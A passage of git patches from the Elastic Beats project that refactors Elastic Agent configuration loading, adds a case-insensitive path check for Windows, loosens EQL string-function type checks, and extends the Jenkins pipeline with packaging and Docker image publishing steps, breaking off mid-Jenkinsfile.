a/x-pack/elastic-agent/pkg/agent/install/paths_darwin.go b/x-pack/elastic-agent/pkg/agent/install/paths_darwin.go index f6ebcdfdbae9..3205116951cd 100644 --- a/x-pack/elastic-agent/pkg/agent/install/paths_darwin.go +++ b/x-pack/elastic-agent/pkg/agent/install/paths_darwin.go @@ -27,3 +27,8 @@ const ( exec /Library/Elastic/Agent/elastic-agent $@ ` ) + +// ArePathsEqual determines whether paths are equal taking case sensitivity of os into account. +func ArePathsEqual(expected, actual string) bool { + return expected == actual +} diff --git a/x-pack/elastic-agent/pkg/agent/install/paths_test.go b/x-pack/elastic-agent/pkg/agent/install/paths_test.go new file mode 100644 index 000000000000..68bfcc6b69bf --- /dev/null +++ b/x-pack/elastic-agent/pkg/agent/install/paths_test.go @@ -0,0 +1,33 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package install + +import ( + "runtime" + "testing" + + "github.com/stretchr/testify/assert" +) + +func TestEqual(t *testing.T) { + isWindows := runtime.GOOS == "windows" + testCases := []struct { + Name string + Expected string + Actual string + ShouldMatch bool + }{ + {"different paths", "/var/path/a", "/var/path/b", false}, + {"strictly same paths", "/var/path/a", "/var/path/a", true}, + {"strictly same win paths", `C:\Program Files\Elastic\Agent`, `C:\Program Files\Elastic\Agent`, true}, + {"case insensitive win paths", `C:\Program Files\Elastic\Agent`, `c:\Program Files\Elastic\Agent`, isWindows}, + } + + for _, tc := range testCases { + t.Run(tc.Name, func(t *testing.T) { + assert.Equal(t, tc.ShouldMatch, ArePathsEqual(tc.Expected, tc.Actual)) + }) + } +} diff --git a/x-pack/elastic-agent/pkg/agent/install/paths_windows.go b/x-pack/elastic-agent/pkg/agent/install/paths_windows.go index 3af4c79d9415..d068fc0c40ad 100644 --- a/x-pack/elastic-agent/pkg/agent/install/paths_windows.go +++ b/x-pack/elastic-agent/pkg/agent/install/paths_windows.go @@ -6,6 +6,8 @@ package install +import "strings" + const ( // BinaryName is the name of the installed binary. BinaryName = "elastic-agent.exe" @@ -25,3 +27,8 @@ const ( // ShellWrapper is the wrapper that is installed. ShellWrapper = "" // no wrapper on Windows ) + +// ArePathsEqual determines whether paths are equal taking case sensitivity of os into account. +func ArePathsEqual(expected, actual string) bool { + return strings.EqualFold(expected, actual) +} From de7906bb8f0e99b7a535d710a73c7e24c1bd793c Mon Sep 17 00:00:00 2001 From: Blake Rouse Date: Thu, 11 Feb 2021 09:50:19 -0500 Subject: [PATCH 30/63] [Elastic Agent] Fix issues with dynamic inputs and conditions (#23886) * Fix loading of configurations to not parse variables in inputs. Fix issue with EQL string methods. * Run fmt. * Add changelog entry. * Cleanup the config loading more. * Fix NewConfigFrom to handle maps. --- x-pack/elastic-agent/CHANGELOG.next.asciidoc | 1 + .../pkg/agent/application/application.go | 2 +- .../pkg/agent/application/config.go | 58 ------- .../pkg/agent/application/config_test.go | 40 ----- .../handler_action_policy_change.go | 2 +- .../agent/application/inspect_config_cmd.go | 2 +- x-pack/elastic-agent/pkg/agent/cmd/enroll.go | 3 +- x-pack/elastic-agent/pkg/agent/cmd/run.go | 2 +- x-pack/elastic-agent/pkg/agent/cmd/watch.go | 3 +- x-pack/elastic-agent/pkg/config/config.go | 145 +++++++++++++----- .../elastic-agent/pkg/config/config_test.go | 38 +++++ x-pack/elastic-agent/pkg/eql/eql_test.go | 2 +- x-pack/elastic-agent/pkg/eql/methods_str.go | 38 +---- 13 files changed, 164 insertions(+), 172 deletions(-) diff --git a/x-pack/elastic-agent/CHANGELOG.next.asciidoc b/x-pack/elastic-agent/CHANGELOG.next.asciidoc index 38b0e57ef2b7..7c1d714e7c4b 100644 --- a/x-pack/elastic-agent/CHANGELOG.next.asciidoc +++ b/x-pack/elastic-agent/CHANGELOG.next.asciidoc @@ -38,6 +38,7 @@ - Fix issue of missing log messages from filebeat monitor {pull}23514[23514] - Increase checkin grace period to 30 seconds {pull}23568[23568] - Fix libbeat from reporting back degraded on config update {pull}23537[23537] +- Fix issues with dynamic inputs and conditions {pull}23886[23886] ==== New features diff --git a/x-pack/elastic-agent/pkg/agent/application/application.go b/x-pack/elastic-agent/pkg/agent/application/application.go index f87cad3a09cd..af50477d5fda 100644 --- a/x-pack/elastic-agent/pkg/agent/application/application.go +++ b/x-pack/elastic-agent/pkg/agent/application/application.go @@ -35,7 +35,7 @@ func New(log *logger.Logger, pathConfigFile string, reexec reexecManager, uc upg // Load configuration from disk to understand in which mode of operation // we must start the elastic-agent, the mode of operation cannot be changed without restarting the // elastic-agent. - rawConfig, err := LoadConfigFromFile(pathConfigFile) + rawConfig, err := config.LoadFile(pathConfigFile) if err != nil { return nil, err } diff --git a/x-pack/elastic-agent/pkg/agent/application/config.go b/x-pack/elastic-agent/pkg/agent/application/config.go index e42f3dcab280..8dfd093e040f 100644 --- a/x-pack/elastic-agent/pkg/agent/application/config.go +++ b/x-pack/elastic-agent/pkg/agent/application/config.go @@ -5,16 +5,8 @@ package application import ( - "io/ioutil" - - "github.com/elastic/go-ucfg" - - "gopkg.in/yaml.v2" - - "github.com/elastic/beats/v7/libbeat/common" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/configuration" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" - "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/config" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/kibana" ) @@ -34,53 +26,3 @@ func createFleetConfigFromEnroll(accessAPIKey string, kbn *kibana.Config) (*conf } return cfg, nil } - -// LoadConfigFromFile loads the Agent configuration from a file. -// -// This must be used to load the Agent configuration, so that variables defined in the inputs are not -// parsed by go-ucfg. Variables from the inputs should be parsed by the transpiler. -func LoadConfigFromFile(path string) (*config.Config, error) { - in, err := ioutil.ReadFile(path) - if err != nil { - return nil, err - } - var m map[string]interface{} - if err := yaml.Unmarshal(in, &m); err != nil { - return nil, err - } - return LoadConfig(m) -} - -// LoadConfig loads the Agent configuration from a map. -// -// This must be used to load the Agent configuration, so that variables defined in the inputs are not -// parsed by go-ucfg. Variables from the inputs should be parsed by the transpiler. -func LoadConfig(in map[string]interface{}) (*config.Config, error) { - // make copy of a map so we dont affect a caller - m := common.MapStr(in).Clone() - - inputs, ok := m["inputs"] - if ok { - // remove the inputs - delete(m, "inputs") - } - cfg, err := config.NewConfigFrom(m) - if err != nil { - return nil, err - } - if ok { - inputsOnly := map[string]interface{}{ - "inputs": inputs, - } - // convert to config without variable substitution - inputsCfg, err := config.NewConfigFrom(inputsOnly, ucfg.PathSep("."), ucfg.ResolveNOOP) - if err != nil { - return nil, err - } - err = cfg.Merge(inputsCfg, ucfg.PathSep("."), ucfg.ResolveNOOP) - if err != nil { - return nil, err - } - } - return cfg, err -} diff --git a/x-pack/elastic-agent/pkg/agent/application/config_test.go b/x-pack/elastic-agent/pkg/agent/application/config_test.go index 09acd68dd83a..824691295fec 100644 --- a/x-pack/elastic-agent/pkg/agent/application/config_test.go +++ b/x-pack/elastic-agent/pkg/agent/application/config_test.go @@ -6,8 +6,6 @@ package application import ( "io/ioutil" - "os" - "path/filepath" "testing" "time" @@ -20,44 +18,6 @@ import ( "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/config" ) -func TestLoadConfig(t *testing.T) { - contents := map[string]interface{}{ - "outputs": map[string]interface{}{ - "default": map[string]interface{}{ - "type": "elasticsearch", - "hosts": []interface{}{"127.0.0.1:9200"}, - "username": "elastic", - "password": "changeme", - }, - }, - "inputs": []interface{}{ - map[string]interface{}{ - "type": "logfile", - "streams": []interface{}{ - map[string]interface{}{ - "paths": []interface{}{"/var/log/${host.name}"}, - }, - }, - }, - }, - } - - tmp, err := ioutil.TempDir("", "config") - require.NoError(t, err) - defer os.RemoveAll(tmp) - - cfgPath := filepath.Join(tmp, "config.yml") - dumpToYAML(t, cfgPath, contents) - - cfg, err := LoadConfigFromFile(cfgPath) - require.NoError(t, err) - - cfgData, err := cfg.ToMapStr() - require.NoError(t, err) - - assert.Equal(t, contents, cfgData) -} - func TestConfig(t *testing.T) { testMgmtMode(t) testLocalConfig(t) diff --git a/x-pack/elastic-agent/pkg/agent/application/handler_action_policy_change.go b/x-pack/elastic-agent/pkg/agent/application/handler_action_policy_change.go index 30a163a7b5e3..b921569a19b4 100644 --- a/x-pack/elastic-agent/pkg/agent/application/handler_action_policy_change.go +++ b/x-pack/elastic-agent/pkg/agent/application/handler_action_policy_change.go @@ -44,7 +44,7 @@ func (h *handlerPolicyChange) Handle(ctx context.Context, a action, acker fleetA return fmt.Errorf("invalid type, expected ActionPolicyChange and received %T", a) } - c, err := LoadConfig(action.Policy) + c, err := config.NewConfigFrom(action.Policy) if err != nil { return errors.New(err, "could not parse the configuration from the policy", errors.TypeConfig) } diff --git a/x-pack/elastic-agent/pkg/agent/application/inspect_config_cmd.go b/x-pack/elastic-agent/pkg/agent/application/inspect_config_cmd.go index 4ea725898f27..15dccd83a88b 100644 --- a/x-pack/elastic-agent/pkg/agent/application/inspect_config_cmd.go +++ b/x-pack/elastic-agent/pkg/agent/application/inspect_config_cmd.go @@ -61,7 +61,7 @@ func (c *InspectConfigCmd) inspectConfig() error { } func loadConfig(configPath string) (*config.Config, error) { - rawConfig, err := LoadConfigFromFile(configPath) + rawConfig, err := config.LoadFile(configPath) if err != nil { return nil, err } diff --git a/x-pack/elastic-agent/pkg/agent/cmd/enroll.go b/x-pack/elastic-agent/pkg/agent/cmd/enroll.go index 2ae011db291d..282ea2f46454 100644 --- a/x-pack/elastic-agent/pkg/agent/cmd/enroll.go +++ b/x-pack/elastic-agent/pkg/agent/cmd/enroll.go @@ -12,6 +12,7 @@ import ( "time" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/control/client" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/config" "github.com/spf13/cobra" @@ -92,7 +93,7 @@ func enroll(streams *cli.IOStreams, cmd *cobra.Command, flags *globalFlags, args } pathConfigFile := flags.Config() - rawConfig, err := application.LoadConfigFromFile(pathConfigFile) + rawConfig, err := config.LoadFile(pathConfigFile) if err != nil { return errors.New(err, fmt.Sprintf("could not read configuration file %s", pathConfigFile), diff --git a/x-pack/elastic-agent/pkg/agent/cmd/run.go b/x-pack/elastic-agent/pkg/agent/cmd/run.go index eb1285855390..ecfac4ff7405 100644 --- a/x-pack/elastic-agent/pkg/agent/cmd/run.go +++ b/x-pack/elastic-agent/pkg/agent/cmd/run.go @@ -79,7 +79,7 @@ func run(flags *globalFlags, streams *cli.IOStreams) error { // Windows: Mark se service.HandleSignals(stopBeat, cancel) pathConfigFile := flags.Config() - rawConfig, err := application.LoadConfigFromFile(pathConfigFile) + rawConfig, err := config.LoadFile(pathConfigFile) if err != nil { return errors.New(err, fmt.Sprintf("could not read configuration file %s", pathConfigFile), diff --git a/x-pack/elastic-agent/pkg/agent/cmd/watch.go b/x-pack/elastic-agent/pkg/agent/cmd/watch.go index 01d73022f995..1124a9508934 100644 --- a/x-pack/elastic-agent/pkg/agent/cmd/watch.go +++ b/x-pack/elastic-agent/pkg/agent/cmd/watch.go @@ -21,6 +21,7 @@ import ( "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/configuration" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/cli" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/config" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/release" ) @@ -182,7 +183,7 @@ func gracePeriod(marker *upgrade.UpdateMarker) (bool, time.Duration) { func configuredLogger(flags *globalFlags) (*logger.Logger, error) { pathConfigFile := flags.Config() - rawConfig, err := application.LoadConfigFromFile(pathConfigFile) + rawConfig, err := config.LoadFile(pathConfigFile) if err != nil { return nil, errors.New(err, fmt.Sprintf("could not read configuration file %s", pathConfigFile), diff --git a/x-pack/elastic-agent/pkg/config/config.go b/x-pack/elastic-agent/pkg/config/config.go index d2d366e526c7..593631f0050e 100644 --- a/x-pack/elastic-agent/pkg/config/config.go +++ b/x-pack/elastic-agent/pkg/config/config.go @@ -8,65 +8,116 @@ import ( "fmt" "io" "io/ioutil" + "os" + + "gopkg.in/yaml.v2" "github.com/elastic/go-ucfg" "github.com/elastic/go-ucfg/cfgutil" - "github.com/elastic/go-ucfg/yaml" ) +// options hold the specified options +type options struct { + skipKeys []string +} + +// Option is an option type that modifies how loading configs work +type Option func(*options) + +// VarSkipKeys prevents variable expansion for these keys. +// +// The provided keys only skip if the keys are top-level keys. +func VarSkipKeys(keys ...string) Option { + return func(opts *options) { + opts.skipKeys = keys + } +} + // DefaultOptions defaults options used to read the configuration -var DefaultOptions = []ucfg.Option{ +var DefaultOptions = []interface{}{ ucfg.PathSep("."), ucfg.ResolveEnv, ucfg.VarExp, + VarSkipKeys("inputs"), } // Config custom type over a ucfg.Config to add new methods on the object. type Config ucfg.Config -// LoadYAML takes YAML configuration and return a concrete Config or any errors. -func LoadYAML(path string, opts ...ucfg.Option) (*Config, error) { - if len(opts) == 0 { - opts = DefaultOptions - } - config, err := yaml.NewConfigWithFile(path, opts...) - if err != nil { - return nil, err - } - return newConfigFrom(config), nil -} - // New creates a new empty config. func New() *Config { return newConfigFrom(ucfg.New()) } // NewConfigFrom takes a interface and read the configuration like it was YAML. -func NewConfigFrom(from interface{}, opts ...ucfg.Option) (*Config, error) { +func NewConfigFrom(from interface{}, opts ...interface{}) (*Config, error) { if len(opts) == 0 { opts = DefaultOptions } - - if str, ok := from.(string); ok { - c, err := yaml.NewConfig([]byte(str), opts...) - return newConfigFrom(c), err + var ucfgOpts []ucfg.Option + var localOpts []Option + for _, o := range opts { + switch ot := o.(type) { + case ucfg.Option: + ucfgOpts = append(ucfgOpts, ot) + case Option: + localOpts = append(localOpts, ot) + default: + return nil, fmt.Errorf("unknown option type %T", o) + } + } + local := &options{} + for _, o := range localOpts { + o(local) } - if in, ok := from.(io.Reader); ok { + var data map[string]interface{} + var err error + if bytes, ok := from.([]byte); ok { + err = yaml.Unmarshal(bytes, &data) + if err != nil { + return nil, err + } + } else if str, ok := from.(string); ok { + err = yaml.Unmarshal([]byte(str), &data) + if err != nil { + return nil, err + } + } else if in, ok := from.(io.Reader); ok { if closer, ok := from.(io.Closer); ok { defer closer.Close() } - - content, err := ioutil.ReadAll(in) + fData, err := ioutil.ReadAll(in) + if err != nil { + return nil, err + } + err = yaml.Unmarshal(fData, &data) if err != nil { return nil, err } - c, err := yaml.NewConfig(content, opts...) + } else if contents, ok := from.(map[string]interface{}); ok { + data = contents + } else { + c, err := ucfg.NewFrom(from, ucfgOpts...) return newConfigFrom(c), err } - c, err := ucfg.NewFrom(from, opts...) - return newConfigFrom(c), err + skippedKeys := map[string]interface{}{} + for _, skip := range local.skipKeys { + val, ok := data[skip] + if ok { + skippedKeys[skip] = val + delete(data, skip) + } + } + cfg, err := ucfg.NewFrom(data, ucfgOpts...) + if err != nil { + return nil, err + } + if len(skippedKeys) > 0 { + err = cfg.Merge(skippedKeys, ucfg.ResolveNOOP) + } + return newConfigFrom(cfg), err } // MustNewConfigFrom try to create a configuration based on the type passed as arguments and panic @@ -84,8 +135,12 @@ func newConfigFrom(in *ucfg.Config) *Config { } // Unpack unpacks a struct to Config. -func (c *Config) Unpack(to interface{}) error { - return c.access().Unpack(to, DefaultOptions...) +func (c *Config) Unpack(to interface{}, opts ...interface{}) error { + ucfgOpts, err := getUcfgOptions(opts...) + if err != nil { + return err + } + return c.access().Unpack(to, ucfgOpts...) } func (c *Config) access() *ucfg.Config { @@ -93,11 +148,12 @@ func (c *Config) access() *ucfg.Config { } // Merge merges two configuration together. -func (c *Config) Merge(from interface{}, opts ...ucfg.Option) error { - if len(opts) == 0 { - opts = DefaultOptions +func (c *Config) Merge(from interface{}, opts ...interface{}) error { + ucfgOpts, err := getUcfgOptions(opts...) + if err != nil { + return err } - return c.access().Merge(from, opts...) + return c.access().Merge(from, ucfgOpts...) } // ToMapStr takes the config and transform it into a map[string]interface{} @@ -127,18 +183,16 @@ func (c *Config) Enabled() bool { // LoadFile take a path and load the file and return a new configuration. func LoadFile(path string) (*Config, error) { - c, err := yaml.NewConfigWithFile(path, DefaultOptions...) + fp, err := os.Open(path) if err != nil { return nil, err } - - cfg := newConfigFrom(c) - return cfg, err + return NewConfigFrom(fp) } // LoadFiles takes multiples files, load and merge all of them in a single one. func LoadFiles(paths ...string) (*Config, error) { - merger := cfgutil.NewCollector(nil, DefaultOptions...) + merger := cfgutil.NewCollector(nil) for _, path := range paths { cfg, err := LoadFile(path) if err := merger.Add(cfg.access(), err); err != nil { @@ -147,3 +201,22 @@ func LoadFiles(paths ...string) (*Config, error) { } return newConfigFrom(merger.Config()), nil } + +func getUcfgOptions(opts ...interface{}) ([]ucfg.Option, error) { + if len(opts) == 0 { + opts = DefaultOptions + } + var ucfgOpts []ucfg.Option + for _, o := range opts { + switch ot := o.(type) { + case ucfg.Option: + ucfgOpts = append(ucfgOpts, ot) + case Option: + // ignored during unpack + continue + default: + return nil, fmt.Errorf("unknown option type %T", o) + } + } + return ucfgOpts, nil +} diff --git a/x-pack/elastic-agent/pkg/config/config_test.go b/x-pack/elastic-agent/pkg/config/config_test.go index f8b32e97d8e7..105663daccef 100644 --- a/x-pack/elastic-agent/pkg/config/config_test.go +++ b/x-pack/elastic-agent/pkg/config/config_test.go @@ -21,6 +21,44 @@ func TestConfig(t *testing.T) { testLoadFiles(t) } +func TestInputsResolveNOOP(t *testing.T) { + contents := map[string]interface{}{ + "outputs": map[string]interface{}{ + "default": map[string]interface{}{ + "type": "elasticsearch", + "hosts": []interface{}{"127.0.0.1:9200"}, + "username": "elastic", + "password": "changeme", + }, + }, + "inputs": []interface{}{ + map[string]interface{}{ + "type": "logfile", + "streams": []interface{}{ + map[string]interface{}{ + "paths": []interface{}{"/var/log/${host.name}"}, + }, + }, + }, + }, + } + + tmp, err := ioutil.TempDir("", "config") + require.NoError(t, err) + defer os.RemoveAll(tmp) + + cfgPath := filepath.Join(tmp, "config.yml") + dumpToYAML(t, cfgPath, contents) + + cfg, err := LoadFile(cfgPath) + require.NoError(t, err) + + cfgData, err := cfg.ToMapStr() + require.NoError(t, err) + + assert.Equal(t, contents, cfgData) +} + func testToMapStr(t *testing.T) { m := map[string]interface{}{ "hello": map[string]interface{}{ diff --git a/x-pack/elastic-agent/pkg/eql/eql_test.go b/x-pack/elastic-agent/pkg/eql/eql_test.go index 5f67c516c81c..c594a6c2a201 100644 --- a/x-pack/elastic-agent/pkg/eql/eql_test.go +++ b/x-pack/elastic-agent/pkg/eql/eql_test.go @@ -296,7 +296,7 @@ func TestEql(t *testing.T) { {expression: "stringContains('hello world', 'rol')", result: false}, {expression: "stringContains('hello world', 'o w', 'too many')", err: true}, {expression: "stringContains(0, 'o w', 'too many')", err: true}, - {expression: "stringContains('hello world', 0)", err: true}, + {expression: "stringContains('hello world', 0)", result: false}, // Bad expression and malformed expression {expression: "length('hello')", err: true}, diff --git a/x-pack/elastic-agent/pkg/eql/methods_str.go b/x-pack/elastic-agent/pkg/eql/methods_str.go index 781e193d9246..b7c49a610365 100644 --- a/x-pack/elastic-agent/pkg/eql/methods_str.go +++ b/x-pack/elastic-agent/pkg/eql/methods_str.go @@ -25,12 +25,7 @@ func endsWith(args []interface{}) (interface{}, error) { if len(args) != 2 { return nil, fmt.Errorf("endsWith: accepts exactly 2 arguments; recieved %d", len(args)) } - input, iOk := args[0].(string) - suffix, sOk := args[1].(string) - if !iOk || !sOk { - return nil, fmt.Errorf("endsWith: accepts exactly 2 string arguments; recieved %T and %T", args[0], args[1]) - } - return strings.HasSuffix(input, suffix), nil + return strings.HasSuffix(toString(args[0]), toString(args[1])), nil } // indexOf returns the starting index of substring @@ -38,11 +33,8 @@ func indexOf(args []interface{}) (interface{}, error) { if len(args) < 2 || len(args) > 3 { return nil, fmt.Errorf("indexOf: accepts 2-3 arguments; recieved %d", len(args)) } - input, iOk := args[0].(string) - substring, sOk := args[1].(string) - if !iOk || !sOk { - return nil, fmt.Errorf("indexOf: argument 0 and 1 must be a string; recieved %T and %T", args[0], args[1]) - } + input := toString(args[0]) + substring := toString(args[1]) start := 0 if len(args) > 2 { s, sOk := args[2].(int) @@ -59,10 +51,7 @@ func match(args []interface{}) (interface{}, error) { if len(args) < 2 { return nil, fmt.Errorf("match: accepts minimum of 2 arguments; recieved %d", len(args)) } - input, iOk := args[0].(string) - if !iOk { - return nil, fmt.Errorf("match: argument 0 must be a string; recieved %T", args[0]) - } + input := toString(args[0]) for i, reg := range args[1:] { switch r := reg.(type) { case string: @@ -85,10 +74,7 @@ func number(args []interface{}) (interface{}, error) { if len(args) < 1 || len(args) > 2 { return nil, fmt.Errorf("number: accepts between 1-2 arguments; recieved %d", len(args)) } - input, iOk := args[0].(string) - if !iOk { - return nil, fmt.Errorf("number: argument 0 must be a string; recieved %T", args[0]) - } + input := toString(args[0]) base := 10 if len(args) > 1 { switch a := args[1].(type) { @@ -113,12 +99,7 @@ func startsWith(args []interface{}) (interface{}, error) { if len(args) != 2 { return nil, fmt.Errorf("startsWith: accepts exactly 2 arguments; recieved %d", len(args)) } - input, iOk := args[0].(string) - prefix, pOk := args[1].(string) - if !iOk || !pOk { - return nil, fmt.Errorf("startsWith: accepts exactly 2 string arguments; recieved %T and %T", args[0], args[1]) - } - return strings.HasPrefix(input, prefix), nil + return strings.HasPrefix(toString(args[0]), toString(args[1])), nil } // str converts the argument into a string @@ -134,12 +115,7 @@ func stringContains(args []interface{}) (interface{}, error) { if len(args) != 2 { return nil, fmt.Errorf("stringContains: accepts exactly 2 arguments; recieved %d", len(args)) } - input, iOk := args[0].(string) - substr, sOk := args[1].(string) - if !iOk || !sOk { - return nil, fmt.Errorf("stringContains: accepts exactly 2 string arguments; recieved %T and %T", args[0], args[1]) - } - return strings.Contains(input, substr), nil + return strings.Contains(toString(args[0]), toString(args[1])), nil } func toString(arg interface{}) string { From dd12389540aeefac19959522e4dd83d00b0c2dd3 Mon Sep 17 00:00:00 2001 From: Victor Martinez Date: Thu, 11 Feb 2021 15:53:07 +0000 Subject: [PATCH 31/63] [CI] Enable packaging with Pipeline 2.0 (#23854) --- Jenkinsfile | 218 ++++++++++++++++++++++++++- Jenkinsfile.yml | 4 +- auditbeat/Jenkinsfile.yml | 4 + filebeat/Jenkinsfile.yml | 4 + heartbeat/Jenkinsfile.yml | 4 + journalbeat/Jenkinsfile.yml | 4 + metricbeat/Jenkinsfile.yml | 4 + packetbeat/Jenkinsfile.yml | 4 + winlogbeat/Jenkinsfile.yml | 4 + x-pack/auditbeat/Jenkinsfile.yml | 4 + x-pack/dockerlogbeat/Jenkinsfile.yml | 4 + x-pack/elastic-agent/Jenkinsfile.yml | 4 + x-pack/filebeat/Jenkinsfile.yml | 4 + x-pack/functionbeat/Jenkinsfile.yml | 4 + x-pack/heartbeat/Jenkinsfile.yml | 19 +++ x-pack/metricbeat/Jenkinsfile.yml | 5 + x-pack/packetbeat/Jenkinsfile.yml | 4 + x-pack/winlogbeat/Jenkinsfile.yml | 6 + 18 files changed, 298 insertions(+), 6 deletions(-) create mode 100644 x-pack/heartbeat/Jenkinsfile.yml diff --git a/Jenkinsfile b/Jenkinsfile index 28113842f962..8f309602c3f2 100644 --- a/Jenkinsfile +++ b/Jenkinsfile @@ -9,7 +9,7 @@ pipeline { AWS_REGION = "${params.awsRegion}" REPO = 'beats' BASE_DIR = "src/github.com/elastic/${env.REPO}" - DOCKERELASTIC_SECRET = 'secret/observability-team/ci/docker-registry/prod' + DOCKER_ELASTIC_SECRET = 'secret/observability-team/ci/docker-registry/prod' DOCKER_COMPOSE_VERSION = "1.21.0" DOCKER_REGISTRY = 'docker.elastic.co' JOB_GCS_BUCKET = 'beats-ci-temp' @@ -19,6 +19,7 @@ pipeline { PYTEST_ADDOPTS = "${params.PYTEST_ADDOPTS}" RUNBLD_DISABLE_NOTIFICATIONS = 'true' SLACK_CHANNEL = "#beats-build" + SNAPSHOT = 'true' TERRAFORM_VERSION = "0.12.24" XPACK_MODULE_PATTERN = '^x-pack\\/[a-z0-9]+beat\\/module\\/([^\\/]+)\\/.*' } @@ -259,17 +260,210 @@ def k8sTest(Map args = [:]) { } } +/** +* This method runs the packaging +*/ +def packagingLinux(Map args = [:]) { + def PLATFORMS = [ '+all', + 'linux/amd64', + 'linux/386', + 'linux/arm64', + 'linux/armv7', + // The platforms above are disabled temporarly as crossbuild images are + // not available. See: https://github.com/elastic/golang-crossbuild/issues/71 + //'linux/ppc64le', + //'linux/mips64', + //'linux/s390x', + 'windows/amd64', + 'windows/386', + (params.macos ? '' : 'darwin/amd64'), + ].join(' ') + withEnv([ + "PLATFORMS=${PLATFORMS}" + ]) { + target(args) + } +} + + +/** +* Upload the packages to their snapshot or pull request buckets +* @param beatsFolder beats folder +*/ +def publishPackages(beatsFolder){ + def bucketUri = "gs://beats-ci-artifacts/snapshots" + if (isPR()) { + bucketUri = "gs://beats-ci-artifacts/pull-requests/pr-${env.CHANGE_ID}" + } + def beatsFolderName = getBeatsName(beatsFolder) + uploadPackages("${bucketUri}/${beatsFolderName}", beatsFolder) + + // Copy those files to another location with the sha commit to test them + // afterward. + bucketUri = "gs://beats-ci-artifacts/commits/${env.GIT_BASE_COMMIT}" + uploadPackages("${bucketUri}/${beatsFolderName}", beatsFolder) +} + +/** +* Upload the distribution files to google cloud. +* TODO: There is a known issue with Google Storage plugin. +* @param bucketUri the buckets URI. +* @param beatsFolder the beats folder. +*/ +def uploadPackages(bucketUri, beatsFolder){ + googleStorageUpload(bucket: bucketUri, + credentialsId: "${JOB_GCS_CREDENTIALS}", + pathPrefix: "${beatsFolder}/build/distributions/", + pattern: "${beatsFolder}/build/distributions/**/*", + sharedPublicly: true, + showInline: true + ) +} + +/** +* Push the docker images for the given beat. +* @param beatsFolder beats folder +*/ +def pushCIDockerImages(beatsFolder){ + catchError(buildResult: 'UNSTABLE', message: 'Unable to push Docker images', stageResult: 'FAILURE') { + if (beatsFolder.endsWith('auditbeat')) { + tagAndPush('auditbeat') + } else if (beatsFolder.endsWith('filebeat')) { + tagAndPush('filebeat') + } else if (beatsFolder.endsWith('heartbeat')) { + tagAndPush('heartbeat') + } else if ("${beatsFolder}" == "journalbeat"){ + tagAndPush('journalbeat') + } else if (beatsFolder.endsWith('metricbeat')) { + tagAndPush('metricbeat') + } else if ("${beatsFolder}" == "packetbeat"){ + tagAndPush('packetbeat') + } else if ("${beatsFolder}" == "x-pack/elastic-agent") { + tagAndPush('elastic-agent') + } + } +} + +/** +* Tag and push all the docker images for the given beat. +* @param beatName name of the Beat +*/ +def tagAndPush(beatName){ + def libbetaVer = env.VERSION + if("${env?.SNAPSHOT.trim()}" == "true"){ + aliasVersion = libbetaVer.substring(0, libbetaVer.lastIndexOf(".")) // remove third number in version + + libbetaVer += "-SNAPSHOT" + aliasVersion += "-SNAPSHOT" + } + + def tagName = "${libbetaVer}" + if (isPR()) { + tagName = "pr-${env.CHANGE_ID}" + } + + // supported image flavours + def variants = ["", "-oss", "-ubi8"] + variants.each { variant -> + doTagAndPush(beatName, variant, libbetaVer, tagName) + doTagAndPush(beatName, variant, libbetaVer, "${env.GIT_BASE_COMMIT}") + + if (!isPR() && aliasVersion != "") { + doTagAndPush(beatName, variant, libbetaVer, aliasVersion) + } + } +} + +/** +* Tag and push the given sourceTag docker image with the tag name targetTag. +* @param beatName name of the Beat +* @param variant name of the variant used to build the docker image name +* @param sourceTag tag to be used as source for the docker tag command, usually under the 'beats' namespace +* @param targetTag tag to be used as target for the docker tag command, usually under the 'observability-ci' namespace +*/ +def doTagAndPush(beatName, variant, sourceTag, targetTag) { + def sourceName = "${DOCKER_REGISTRY}/beats/${beatName}${variant}:${sourceTag}" + def targetName = "${DOCKER_REGISTRY}/observability-ci/${beatName}${variant}:${targetTag}" + + def iterations = 0 + retryWithSleep(retries: 3, seconds: 5, backoff: true) { + iterations++ + def status = sh(label: "Change tag and push ${targetName}", script: """#!/usr/bin/env bash + docker images + if docker image inspect "${sourceName}" &> /dev/null ; then + docker tag ${sourceName} ${targetName} + docker push ${targetName} + else + echo 'docker image ${sourceName} does not exist' + fi + """, returnStatus: true) + if ( status > 0 && iterations < 3) { + error("tag and push failed for ${beatName}, retry") + } else if ( status > 0 ) { + log(level: 'WARN', text: "${beatName} doesn't have ${variant} docker images. See https://github.com/elastic/beats/pull/21621") + } + } +} + +/** +* There is a specific folder structure in https://staging.elastic.co/ and https://artifacts.elastic.co/downloads/ +* therefore the storage bucket in GCP should follow the same folder structure. +* This is required by https://github.com/elastic/beats-tester +* e.g. +* baseDir=name -> return name +* baseDir=name1/name2/name3-> return name2 +*/ +def getBeatsName(baseDir) { + return baseDir.replace('x-pack/', '') +} + +/** +* This method runs the end 2 end testing in the same worker where the packages have been +* generated, this should help to speed up the things +*/ +def e2e(Map args = [:]) { + def enabled = args.e2e?.get('enabled', false) + def entrypoint = args.e2e?.get('entrypoint') + def dockerLogFile = "docker_logs_${entrypoint}.log" + if (!enabled) { return } + dir("${env.WORKSPACE}/src/github.com/elastic/e2e-testing") { + // TBC with the target branch if running on a PR basis. + git(branch: 'master', 